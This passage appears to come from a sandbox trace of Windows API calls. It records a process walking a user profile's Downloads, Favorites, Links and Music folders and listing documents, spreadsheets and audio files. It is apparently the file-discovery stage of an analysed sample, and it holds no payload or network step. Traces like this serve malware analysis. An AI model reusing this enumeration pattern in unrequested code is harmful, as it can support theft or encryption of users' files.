hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56bf7ab0, ftCreationTime.dwHighDateTime=0x1d81cb4, ftLastAccessTime.dwLowDateTime=0x50830790, ftLastAccessTime.dwHighDateTime=0x1d82095, ftLastWriteTime.dwLowDateTime=0x50830790, ftLastWriteTime.dwHighDateTime=0x1d82095, nFileSizeHigh=0x0, nFileSizeLow=0x1218e, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPo8_m0ryn 6ACWfcC.doc", cAlternateFileName="EPO8_M~1.DOC")) returned 1 [0256.713] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42b4fa50, ftCreationTime.dwHighDateTime=0x1d82140, ftLastAccessTime.dwLowDateTime=0x3e2dfb40, ftLastAccessTime.dwHighDateTime=0x1d826d5, ftLastWriteTime.dwLowDateTime=0x3e2dfb40, ftLastWriteTime.dwHighDateTime=0x1d826d5, nFileSizeHigh=0x0, nFileSizeLow=0x10f9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="EzlWVPEgGWw7Xy7.ods", cAlternateFileName="EZLWVP~1.ODS")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe338f670, ftCreationTime.dwHighDateTime=0x1d826ef, ftLastAccessTime.dwLowDateTime=0x35e6bcf0, ftLastAccessTime.dwHighDateTime=0x1d82956, ftLastWriteTime.dwLowDateTime=0x35e6bcf0, ftLastWriteTime.dwHighDateTime=0x1d82956, nFileSizeHigh=0x0, nFileSizeLow=0x2810, dwReserved0=0x0, dwReserved1=0x0, cFileName="GFqXQi80UXX3UPgD.pdf", cAlternateFileName="GFQXQI~1.PDF")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cd2a780, ftCreationTime.dwHighDateTime=0x1d82605, ftLastAccessTime.dwLowDateTime=0xad558900, ftLastAccessTime.dwHighDateTime=0x1d8269b, ftLastWriteTime.dwLowDateTime=0xad558900, ftLastWriteTime.dwHighDateTime=0x1d8269b, nFileSizeHigh=0x0, nFileSizeLow=0x9957, dwReserved0=0x0, dwReserved1=0x0, cFileName="L-u71CPit811c.xls", cAlternateFileName="L-U71C~1.XLS")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11bc0260, ftCreationTime.dwHighDateTime=0x1d821de, ftLastAccessTime.dwLowDateTime=0x467762a0, ftLastAccessTime.dwHighDateTime=0x1d82437, ftLastWriteTime.dwLowDateTime=0x467762a0, ftLastWriteTime.dwHighDateTime=0x1d82437, nFileSizeHigh=0x0, nFileSizeLow=0x18cc1, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRY0tYZ9Ff0noTxW-ck.pptx", cAlternateFileName="NRY0TY~1.PPT")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed7ef80, ftCreationTime.dwHighDateTime=0x1d81db0, ftLastAccessTime.dwLowDateTime=0xf3e8b9e0, ftLastAccessTime.dwHighDateTime=0x1d826d3, ftLastWriteTime.dwLowDateTime=0xf3e8b9e0, ftLastWriteTime.dwHighDateTime=0x1d826d3, nFileSizeHigh=0x0, nFileSizeLow=0x3fbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4XyZ4ZdDUL8nyTp.csv", cAlternateFileName="O4XYZ4~1.CSV")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9d62700, ftCreationTime.dwHighDateTime=0x1d824e5, ftLastAccessTime.dwLowDateTime=0xca3a1ea0, ftLastAccessTime.dwHighDateTime=0x1d8262d, ftLastWriteTime.dwLowDateTime=0xca3a1ea0, ftLastWriteTime.dwHighDateTime=0x1d8262d, nFileSizeHigh=0x0, nFileSizeLow=0xfbd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v4ns79y.pptx", cAlternateFileName="V4NS79~1.PPT")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe655e0, ftCreationTime.dwHighDateTime=0x1d825ed, ftLastAccessTime.dwLowDateTime=0x5e087550, ftLastAccessTime.dwHighDateTime=0x1d82688, ftLastWriteTime.dwLowDateTime=0x5e087550, ftLastWriteTime.dwHighDateTime=0x1d82688, nFileSizeHigh=0x0, nFileSizeLow=0x110e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vi-SNb.xls", cAlternateFileName="")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907d3120, ftCreationTime.dwHighDateTime=0x1d81b10, ftLastAccessTime.dwLowDateTime=0x412841d0, ftLastAccessTime.dwHighDateTime=0x1d8212a, ftLastWriteTime.dwLowDateTime=0x412841d0, ftLastWriteTime.dwHighDateTime=0x1d8212a, nFileSizeHigh=0x0, nFileSizeLow=0x78cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="vTjM.rtf", cAlternateFileName="")) returned 1 [0256.714] FindNextFileW (in: hFindFile=0x8feb00, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.714] FindClose (in: hFindFile=0x8feb00 | out: hFindFile=0x8feb00) returned 1 [0256.717] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Downloads" (normalized: "c:\\users\\rdhj0cnfevzx\\downloads"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.717] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Downloads\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fed00 [0256.717] FindNextFileW (in: hFindFile=0x8fed00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.718] FindNextFileW (in: hFindFile=0x8fed00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436bc315, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436bc315, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.718] FindNextFileW (in: hFindFile=0x8fed00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.718] FindClose (in: hFindFile=0x8fed00 | out: hFindFile=0x8fed00) returned 1 [0256.718] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.718] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fef40 [0256.721] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.721] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43053b43, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43053b43, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bing.url", cAlternateFileName="")) returned 1 [0256.721] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x436238c4, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.721] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0256.721] FindNextFileW (in: hFindFile=0x8fef40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.721] FindClose (in: hFindFile=0x8fef40 | out: hFindFile=0x8fef40) returned 1 [0256.721] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\favorites\\links"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.721] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Favorites\\Links\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feec0 [0256.722] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.722] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43079e90, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43079e90, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43079e90, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.722] FindNextFileW (in: hFindFile=0x8feec0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.722] FindClose (in: hFindFile=0x8feec0 | out: hFindFile=0x8feec0) returned 1 [0256.723] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Links" (normalized: "c:\\users\\rdhj0cnfevzx\\links"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.723] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Links\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8febc0 [0256.723] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.723] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x43754b80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43754b80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437ed538, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.723] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x207, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0256.723] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437c7194, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x437c7194, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x437c7194, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0256.723] FindNextFileW (in: hFindFile=0x8febc0, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.723] FindClose (in: hFindFile=0x8febc0 | out: hFindFile=0x8febc0) returned 1 [0256.724] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music" (normalized: "c:\\users\\rdhj0cnfevzx\\music"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.724] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7afe133, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7afe133, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb40 [0256.724] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf7afe133, ftLastAccessTime.dwHighDateTime=0x1d82a28, ftLastWriteTime.dwLowDateTime=0xf7afe133, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28530170, ftCreationTime.dwHighDateTime=0x1d81a1a, ftLastAccessTime.dwLowDateTime=0xbee46790, ftLastAccessTime.dwHighDateTime=0x1d8294d, ftLastWriteTime.dwLowDateTime=0xbee46790, ftLastWriteTime.dwHighDateTime=0x1d8294d, nFileSizeHigh=0x0, nFileSizeLow=0x10bfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="AnJCv.mp3", cAlternateFileName="")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43649a85, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43649a85, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436bc315, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f05b450, ftCreationTime.dwHighDateTime=0x1d821bd, ftLastAccessTime.dwLowDateTime=0x6be0c6e0, ftLastAccessTime.dwHighDateTime=0x1d8264d, ftLastWriteTime.dwLowDateTime=0x6be0c6e0, ftLastWriteTime.dwHighDateTime=0x1d8264d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jbo1FZx", cAlternateFileName="")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa73684b0, ftCreationTime.dwHighDateTime=0x1d81a30, ftLastAccessTime.dwLowDateTime=0x9bd82d30, ftLastAccessTime.dwHighDateTime=0x1d824c6, ftLastWriteTime.dwLowDateTime=0x9bd82d30, ftLastWriteTime.dwHighDateTime=0x1d824c6, nFileSizeHigh=0x0, nFileSizeLow=0xc2b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="k84JGTm.mp3", cAlternateFileName="")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeecab770, ftCreationTime.dwHighDateTime=0x1d82835, ftLastAccessTime.dwLowDateTime=0x5cc231b0, ftLastAccessTime.dwHighDateTime=0x1d82951, ftLastWriteTime.dwLowDateTime=0x5cc231b0, ftLastWriteTime.dwHighDateTime=0x1d82951, nFileSizeHigh=0x0, nFileSizeLow=0xf20f, dwReserved0=0x0, dwReserved1=0x0, cFileName="rmbfWOcSo8.wav", cAlternateFileName="RMBFWO~1.WAV")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd2def0, ftCreationTime.dwHighDateTime=0x1d819e1, ftLastAccessTime.dwLowDateTime=0xdc27f810, ftLastAccessTime.dwHighDateTime=0x1d820c6, ftLastWriteTime.dwLowDateTime=0xdc27f810, ftLastWriteTime.dwHighDateTime=0x1d820c6, nFileSizeHigh=0x0, nFileSizeLow=0x14ebc, dwReserved0=0x0, dwReserved1=0x0, cFileName="V1BQkFza0j-jprapAdp.wav", cAlternateFileName="V1BQKF~1.WAV")) returned 1 [0256.725] FindNextFileW (in: hFindFile=0x8feb40, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.725] FindClose (in: hFindFile=0x8feb40 | out: hFindFile=0x8feb40) returned 1 [0256.735] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.735] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f05b450, ftCreationTime.dwHighDateTime=0x1d821bd, ftLastAccessTime.dwLowDateTime=0x6be0c6e0, ftLastAccessTime.dwHighDateTime=0x1d8264d, ftLastWriteTime.dwLowDateTime=0x6be0c6e0, ftLastWriteTime.dwHighDateTime=0x1d8264d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe980 [0256.735] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f05b450, ftCreationTime.dwHighDateTime=0x1d821bd, ftLastAccessTime.dwLowDateTime=0x6be0c6e0, ftLastAccessTime.dwHighDateTime=0x1d8264d, ftLastWriteTime.dwLowDateTime=0x6be0c6e0, ftLastWriteTime.dwHighDateTime=0x1d8264d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.735] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60a08620, ftCreationTime.dwHighDateTime=0x1d823e7, ftLastAccessTime.dwLowDateTime=0x88f7a290, ftLastAccessTime.dwHighDateTime=0x1d8264c, ftLastWriteTime.dwLowDateTime=0x88f7a290, ftLastWriteTime.dwHighDateTime=0x1d8264c, nFileSizeHigh=0x0, nFileSizeLow=0x5ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="62mMsJbyJlq 9a.wav", cAlternateFileName="62MMSJ~1.WAV")) returned 1 [0256.735] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79330300, ftCreationTime.dwHighDateTime=0x1d826d7, ftLastAccessTime.dwLowDateTime=0x88d48d00, ftLastAccessTime.dwHighDateTime=0x1d82877, ftLastWriteTime.dwLowDateTime=0x88d48d00, ftLastWriteTime.dwHighDateTime=0x1d82877, nFileSizeHigh=0x0, nFileSizeLow=0x14c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="92 o.mp3", cAlternateFileName="92O~1.MP3")) returned 1 [0256.735] FindNextFileW (in: hFindFile=0x8fe980, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19a8bfa0, 